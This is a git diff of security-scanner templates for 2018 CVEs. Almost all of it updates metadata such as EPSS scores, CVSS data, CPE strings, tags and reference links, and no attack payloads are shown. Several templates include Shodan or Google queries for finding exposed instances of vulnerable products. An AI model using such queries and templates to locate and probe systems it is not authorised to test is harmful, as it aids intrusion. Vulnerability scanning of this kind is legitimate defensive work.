--- a/http/cves/2018/CVE-2018-16167.yaml
+++ b/http/cves/2018/CVE-2018-16167.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-78
epss-score: 0.13203
cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94828
metadata:
max-request: 1
vendor: jpcert
diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml
index 4cd6f85204..bea41a06ad 100644
--- a/http/cves/2018/CVE-2018-16283.yaml
+++ b/http/cves/2018/CVE-2018-16283.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-16283
cwe-id: CWE-22
- epss-score: 0.20198
+ epss-score: 0.2134
cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.95789
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml
index 27494001c1..f1ca9f4208 100644
--- a/http/cves/2018/CVE-2018-16288.yaml
+++ b/http/cves/2018/CVE-2018-16288.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 8.6
cve-id: CVE-2018-16288
cwe-id: CWE-200
- epss-score: 0.1824
+ epss-score: 0.2541
cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:*
+ epss-percentile: 0.96066
metadata:
max-request: 1
vendor: lg
diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml
index c42451709f..39abf3bcdd 100644
--- a/http/cves/2018/CVE-2018-16299.yaml
+++ b/http/cves/2018/CVE-2018-16299.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-16299
cwe-id: CWE-22
- epss-score: 0.11104
+ epss-score: 0.08709
cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.93696
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2018/CVE-2018-16341.yaml b/http/cves/2018/CVE-2018-16341.yaml
index f621ad2d63..cb895ebc67 100644
--- a/http/cves/2018/CVE-2018-16341.yaml
+++ b/http/cves/2018/CVE-2018-16341.yaml
@@ -6,13 +6,13 @@ info:
severity: high
description: |
Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection.
- classification:
- cve-id: CVE-2018-16341
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-16299
- tags: cve,cve2018,nuxeo,ssti,rce,bypass
+ classification:
+ cve-id: CVE-2018-16341
metadata:
max-request: 1
+ tags: cve,cve2018,nuxeo,ssti,rce,bypass
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml
index 95b5a0cd96..311fe57c58 100644
--- a/http/cves/2018/CVE-2018-16668.yaml
+++ b/http/cves/2018/CVE-2018-16668.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2018-16668
cwe-id: CWE-287
- epss-score: 0.00374
+ epss-score: 0.00352
cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*
+ epss-percentile: 0.68356
metadata:
max-request: 1
vendor: circontrol
diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml
index e0ed2229df..726a725672 100644
--- a/http/cves/2018/CVE-2018-16670.yaml
+++ b/http/cves/2018/CVE-2018-16670.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2018-16670
cwe-id: CWE-287
- epss-score: 0.00199
+ epss-score: 0.00187
cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*
+ epss-percentile: 0.55422
metadata:
max-request: 1
vendor: circontrol
diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml
index 004e7f3e11..7f6d286344 100644
--- a/http/cves/2018/CVE-2018-16671.yaml
+++ b/http/cves/2018/CVE-2018-16671.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2018-16671
cwe-id: CWE-200
- epss-score: 0.0038
+ epss-score: 0.00357
cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*
+ epss-percentile: 0.68577
metadata:
max-request: 1
vendor: "circontrol"
diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml
index 8b3b0cc0cc..03009b40be 100644
--- a/http/cves/2018/CVE-2018-16716.yaml
+++ b/http/cves/2018/CVE-2018-16716.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 9.1
cve-id: CVE-2018-16716
cwe-id: CWE-22
- epss-score: 0.00581
+ epss-score: 0.00803
cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:*
+ epss-percentile: 0.7951
metadata:
max-request: 1
vendor: nih
diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml
index 9da9921dbc..08afc87ccb 100644
--- a/http/cves/2018/CVE-2018-16761.yaml
+++ b/http/cves/2018/CVE-2018-16761.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00068
cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:*
+ epss-percentile: 0.28011
metadata:
max-request: 2
vendor: eventum_project
diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml
index 01478c8d80..8cb73dab0d 100644
--- a/http/cves/2018/CVE-2018-16763.yaml
+++ b/http/cves/2018/CVE-2018-16763.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-16763
cwe-id: CWE-74
- epss-score: 0.75214
+ epss-score: 0.79948
cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97878
metadata:
max-request: 1
vendor: thedaylightstudio
diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml
index 0f3c6a6bb1..9b766218b6 100644
--- a/http/cves/2018/CVE-2018-16836.yaml
+++ b/http/cves/2018/CVE-2018-16836.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-16836
cwe-id: CWE-22
- epss-score: 0.2221
+ epss-score: 0.34263
cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96533
metadata:
max-request: 1
vendor: rubedo_project
diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml
index 2b47330554..e14105ec94 100644
--- a/http/cves/2018/CVE-2018-16979.yaml
+++ b/http/cves/2018/CVE-2018-16979.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-113
epss-score: 0.00118
cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*
+ epss-percentile: 0.45103
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml
index e41720066b..a026665bb4 100644
--- a/http/cves/2018/CVE-2018-17246.yaml
+++ b/http/cves/2018/CVE-2018-17246.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-829,CWE-73
epss-score: 0.96913
cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99595
metadata:
max-request: 1
vendor: elastic
diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml
index 13923109fc..e4d56b7cdf 100644
--- a/http/cves/2018/CVE-2018-17254.yaml
+++ b/http/cves/2018/CVE-2018-17254.yaml
@@ -14,15 +14,15 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-17254
cwe-id: CWE-89
- epss-score: 0.83749
+ epss-score: 0.81793
cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:*
+ epss-percentile: 0.97937
metadata:
max-request: 1
framework: joomla\!
vendor: arkextensions
product: jck_editor
tags: cve,cve2018,packetstorm,edb,joomla,sqli
-
variables:
num: "999999999"
diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml
index 26a3a062a0..579f4b56dd 100644
--- a/http/cves/2018/CVE-2018-17422.yaml
+++ b/http/cves/2018/CVE-2018-17422.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00118
cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.45103
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml
index 677e087c3c..d2a60224a0 100644
--- a/http/cves/2018/CVE-2018-17431.yaml
+++ b/http/cves/2018/CVE-2018-17431.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-287
epss-score: 0.10458
cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94254
metadata:
max-request: 2
vendor: comodo
diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml
index 0e5c1d8340..9bdb4e8caf 100644
--- a/http/cves/2018/CVE-2018-18069.yaml
+++ b/http/cves/2018/CVE-2018-18069.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00106
cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.42502
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml
index 37d75235b8..81a0dc8fe8 100644
--- a/http/cves/2018/CVE-2018-18264.yaml
+++ b/http/cves/2018/CVE-2018-18264.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-18264
cwe-id: CWE-306
- epss-score: 0.97406
+ epss-score: 0.97405
cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99881
metadata:
max-request: 2
shodan-query: product:"Kubernetes"
diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml
index f50f23dafc..2ae82495e1 100644
--- a/http/cves/2018/CVE-2018-18323.yaml
+++ b/http/cves/2018/CVE-2018-18323.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.97376
cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:*
+ epss-percentile: 0.99858
metadata:
max-request: 1
vendor: control-webpanel
diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml
index e062649078..ce5e52cc12 100644
--- a/http/cves/2018/CVE-2018-18570.yaml
+++ b/http/cves/2018/CVE-2018-18570.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00098
cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:*
+ epss-percentile: 0.40032
metadata:
max-request: 1
vendor: planonsoftware
diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml
index 63da2f3809..2ab7dc5aca 100644
--- a/http/cves/2018/CVE-2018-18608.yaml
+++ b/http/cves/2018/CVE-2018-18608.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00177
cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:*
+ epss-percentile: 0.54186
metadata:
max-request: 1
shodan-query: http.html:"DedeCms"
diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml
index 705ad23980..5092f3c21c 100644
--- a/http/cves/2018/CVE-2018-18775.yaml
+++ b/http/cves/2018/CVE-2018-18775.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00235
cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:*
+ epss-percentile: 0.60867
metadata:
max-request: 1
vendor: microstrategy
diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml
index ff0ed1585f..7c8b046296 100644
--- a/http/cves/2018/CVE-2018-18777.yaml
+++ b/http/cves/2018/CVE-2018-18777.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00238
cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:*
+ epss-percentile: 0.61201
metadata:
max-request: 1
vendor: microstrategy
diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml
index 4ef63598c2..1faa2acf10 100644
--- a/http/cves/2018/CVE-2018-18778.yaml
+++ b/http/cves/2018/CVE-2018-18778.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-200
epss-score: 0.95125
cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99024
metadata:
max-request: 1
vendor: acme
diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml
index a9e4221336..e28b1ed11d 100644
--- a/http/cves/2018/CVE-2018-18809.yaml
+++ b/http/cves/2018/CVE-2018-18809.yaml
@@ -3,20 +3,30 @@ id: CVE-2018-18809
info:
name: TIBCO JasperReports Library - Directory Traversal
author: DhiyaneshDK
- severity: critical
+ severity: medium
description: |
The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system.
reference:
- https://packetstormsecurity.com/files/154406/Tibco-JasperSoft-Path-Traversal.html
- https://security.elarlang.eu/cve-2018-18809-path-traversal-in-tibco-jaspersoft.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-18809
+ - http://packetstormsecurity.com/files/154406/Tibco-JasperSoft-Path-Traversal.html
+ - http://seclists.org/fulldisclosure/2019/Sep/17
classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
cve-id: CVE-2018-18809
+ cwe-id: CWE-22
+ epss-score: 0.46465
+ cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:*
+ epss-percentile: 0.96953
metadata:
max-request: 1
verified: true
shodan-query: html:"jasperserver-pro"
- tags: cve,cve2018,lfi,kev,jasperserver,jasperreport
+ vendor: tibco
+ product: jasperreports_library
+ tags: packetstorm,cve,cve2018,lfi,kev,jasperserver,jasperreport
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml
index 3e96ad2338..3abc796b1f 100644
--- a/http/cves/2018/CVE-2018-18925.yaml
+++ b/http/cves/2018/CVE-2018-18925.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-18925
cwe-id: CWE-384
- epss-score: 0.12213
+ epss-score: 0.13227
cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94833
metadata:
max-request: 2
vendor: gogs
diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml
index c6d9204ebd..481d106409 100644
--- a/http/cves/2018/CVE-2018-19136.yaml
+++ b/http/cves/2018/CVE-2018-19136.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2018-19136
cwe-id: CWE-79
- epss-score: 0.00351
+ epss-score: 0.00247
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
+ epss-percentile: 0.61938
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml
index 956c1f0a92..16b75b6070 100644
--- a/http/cves/2018/CVE-2018-19137.yaml
+++ b/http/cves/2018/CVE-2018-19137.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0008
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
+ epss-percentile: 0.33312
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml
index 1c96a75b15..b037766cbc 100644
--- a/http/cves/2018/CVE-2018-19287.yaml
+++ b/http/cves/2018/CVE-2018-19287.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.82305
cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.97953
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml
index 38f253b45d..a691be7d32 100644
--- a/http/cves/2018/CVE-2018-19326.yaml
+++ b/http/cves/2018/CVE-2018-19326.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-19326
cwe-id: CWE-22
- epss-score: 0.01113
+ epss-score: 0.01394
cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.84719
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml
index 5ed7e0217b..77029f05d6 100644
--- a/http/cves/2018/CVE-2018-19365.yaml
+++ b/http/cves/2018/CVE-2018-19365.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.1
cve-id: CVE-2018-19365
cwe-id: CWE-22
- epss-score: 0.01748
+ epss-score: 0.01616
cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:*
+ epss-percentile: 0.85867
metadata:
max-request: 1
vendor: wowza
diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml
index 697d602e71..a4ed2c013c 100644
--- a/http/cves/2018/CVE-2018-19386.yaml
+++ b/http/cves/2018/CVE-2018-19386.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00205
cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:*
+ epss-percentile: 0.57738
metadata:
max-request: 1
vendor: solarwinds
diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml
index 64637561b8..47dad8fe4e 100644
--- a/http/cves/2018/CVE-2018-19439.yaml
+++ b/http/cves/2018/CVE-2018-19439.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.01135
cpe: cpe:2.3:a:oracle:secure_global_desktop:4.4:*:*:*:*:*:*:*
+ epss-percentile: 0.82901
metadata:
max-request: 1
vendor: oracle
diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml
index 07f16bcd75..96de053589 100644
--- a/http/cves/2018/CVE-2018-19458.yaml
+++ b/http/cves/2018/CVE-2018-19458.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-19458
cwe-id: CWE-287
- epss-score: 0.15682
+ epss-score: 0.10992
cpe: cpe:2.3:a:php-proxy:php-proxy:3.0.3:*:*:*:*:*:*:*
+ epss-percentile: 0.9438
metadata:
max-request: 1
vendor: php-proxy
diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml
index 001344cb51..46f662e2b5 100644
--- a/http/cves/2018/CVE-2018-19749.yaml
+++ b/http/cves/2018/CVE-2018-19749.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00156
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
+ epss-percentile: 0.51378
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2018/CVE-2018-19751.yaml b/http/cves/2018/CVE-2018-19751.yaml
index fa8a01f6a5..003fc667d2 100644
--- a/http/cves/2018/CVE-2018-19751.yaml
+++ b/http/cves/2018/CVE-2018-19751.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00156
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
+ epss-percentile: 0.51378
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml
index c2eb77a8f1..3602e63bc4 100644
--- a/http/cves/2018/CVE-2018-19752.yaml
+++ b/http/cves/2018/CVE-2018-19752.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00156
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
+ epss-percentile: 0.51378
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml
index c4f35d57be..2c7dd006e7 100644
--- a/http/cves/2018/CVE-2018-19753.yaml
+++ b/http/cves/2018/CVE-2018-19753.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-19753
cwe-id: CWE-22
- epss-score: 0.01119
+ epss-score: 0.01061
cpe: cpe:2.3:a:oracle:tarantella_enterprise:*:*:*:*:*:*:*:*
+ epss-percentile: 0.82317
metadata:
max-request: 1
vendor: oracle
diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml
index 057ae46c8e..343dac18b6 100644
--- a/http/cves/2018/CVE-2018-19877.yaml
+++ b/http/cves/2018/CVE-2018-19877.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00268
cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:*
+ epss-percentile: 0.63562
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2018/CVE-2018-19892.yaml b/http/cves/2018/CVE-2018-19892.yaml
index 828157ddb1..700f972790 100644
--- a/http/cves/2018/CVE-2018-19892.yaml
+++ b/http/cves/2018/CVE-2018-19892.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00101
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
+ epss-percentile: 0.40768
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml
index 4dbd333951..7141536c04 100644
--- a/http/cves/2018/CVE-2018-19914.yaml
+++ b/http/cves/2018/CVE-2018-19914.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0025
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
+ epss-percentile: 0.6216
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml
index 69b11737a1..224db35096 100644
--- a/http/cves/2018/CVE-2018-19915.yaml
+++ b/http/cves/2018/CVE-2018-19915.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00185
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
+ epss-percentile: 0.55039
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml
index 890eaae0a1..1b08bab775 100644
--- a/http/cves/2018/CVE-2018-20009.yaml
+++ b/http/cves/2018/CVE-2018-20009.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0025
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
+ epss-percentile: 0.6216
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml
index e3bae06be9..955687a22e 100644
--- a/http/cves/2018/CVE-2018-20010.yaml
+++ b/http/cves/2018/CVE-2018-20010.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0025
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
+ epss-percentile: 0.6216
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2018/CVE-2018-20011.yaml b/http/cves/2018/CVE-2018-20011.yaml
index cb88c0dba7..b33446edf1 100644
--- a/http/cves/2018/CVE-2018-20011.yaml
+++ b/http/cves/2018/CVE-2018-20011.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0025
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
+ epss-percentile: 0.6216
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml
index e261b9cbe9..b891e9d4f5 100644
--- a/http/cves/2018/CVE-2018-20462.yaml
+++ b/http/cves/2018/CVE-2018-20462.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00245
cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.61735
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2018/CVE-2018-20463.yaml b/http/cves/2018/CVE-2018-20463.yaml
index 1a713dec10..e9f990df95 100644
--- a/http/cves/2018/CVE-2018-20463.yaml
+++ b/http/cves/2018/CVE-2018-20463.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-20463
cwe-id: CWE-22
- epss-score: 0.02031
+ epss-score: 0.02026
cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.87475
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml
index 59b267251f..53e4fdff97 100644
--- a/http/cves/2018/CVE-2018-20470.yaml
+++ b/http/cves/2018/CVE-2018-20470.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.61765
cpe: cpe:2.3:a:sahipro:sahi_pro:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97374
metadata:
max-request: 1
vendor: sahipro
diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml
index 35d4669f3a..c13f35b53d 100644
--- a/http/cves/2018/CVE-2018-20526.yaml
+++ b/http/cves/2018/CVE-2018-20526.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-434
epss-score: 0.00794
cpe: cpe:2.3:a:roxyfileman:roxy_fileman:1.4.5:*:*:*:*:*:*:*
+ epss-percentile: 0.7941
metadata:
max-request: 2
google-query: intitle:"Roxy file manager"
diff --git a/http/cves/2018/CVE-2018-20608.yaml b/http/cves/2018/CVE-2018-20608.yaml
index 288c605c16..e03c8b0dd5 100644
--- a/http/cves/2018/CVE-2018-20608.yaml
+++ b/http/cves/2018/CVE-2018-20608.yaml
@@ -8,9 +8,17 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-20608
classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
cve-id: CVE-2018-20608
+ cwe-id: CWE-200
+ epss-score: 0.03654
+ cpe: cpe:2.3:a:txjia:imcat:4.4:*:*:*:*:*:*:*
+ epss-percentile: 0.90503
metadata:
max-request: 1
+ vendor: txjia
+ product: imcat
tags: cve,cve2018,imcat,phpinfo,config
http:
diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml
index 1fb0fcc451..2f4bc40f9f 100644
--- a/http/cves/2018/CVE-2018-20824.yaml
+++ b/http/cves/2018/CVE-2018-20824.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00211
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
+ epss-percentile: 0.58311
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml
index 7107e78bd8..257d98c2c6 100644
--- a/http/cves/2018/CVE-2018-20985.yaml
+++ b/http/cves/2018/CVE-2018-20985.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-20
epss-score: 0.01113
cpe: cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.82735
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2018/CVE-2018-2392.yaml b/http/cves/2018/CVE-2018-2392.yaml
index d4b1ff1f5b..9be966ac35 100644
--- a/http/cves/2018/CVE-2018-2392.yaml
+++ b/http/cves/2018/CVE-2018-2392.yaml
@@ -20,6 +20,7 @@ info:
cwe-id: CWE-611
epss-score: 0.0032
cpe: cpe:2.3:a:sap:internet_graphics_server:7.20:*:*:*:*:*:*:*
+ epss-percentile: 0.66795
metadata:
max-request: 1
vendor: sap
diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml
index def6129dbb..4be9569149 100644
